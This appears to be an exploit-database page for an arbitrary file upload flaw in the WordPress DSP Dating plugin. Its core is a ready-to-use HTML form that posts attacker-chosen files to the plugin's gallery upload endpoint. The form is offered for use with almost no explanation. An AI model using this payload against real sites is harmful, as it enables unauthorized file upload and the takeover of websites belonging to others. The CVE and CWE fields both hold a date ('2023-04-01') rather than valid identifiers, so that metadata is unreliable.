Wordpress Dsp Dating Csrf FIle Upload

2023.01.06
id UnM@SK (ID) id
Risk: Low
Local: No
Remote: Yes
CVE: 2023-04-01
CWE: 2023-04-01

exploit /wp-content/plugins/dsp_dating/wpdating-gallery/lib/server/php/ <html><head><title>Wordpress Plugins DSP_DATING CSRF FILE UPLOAD</title> </head><body bgcolor="white" class="intent-mouse"><center> <h1>Wordpress Plugins DSP_DATING CSRF FILE UPLOAD</h1><h1> <font color="black"> <form method="POST" action="/wp-content/plugins/dsp_dating/wpdating-gallery/lib/server/php/" enctype="multipart/form-data"> <input type="file" name="files[]"><br> <input type="albumId" name="albumId"><br> <input type="submit" name="Submit" value="Upload ?"> <center><h5></h5>© Indonesian Code Party <h5></h5> </center></form></font></h1></center> </body></html>


Vote for this issue:
25%
75%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023, cxsecurity.com

 

Back to Top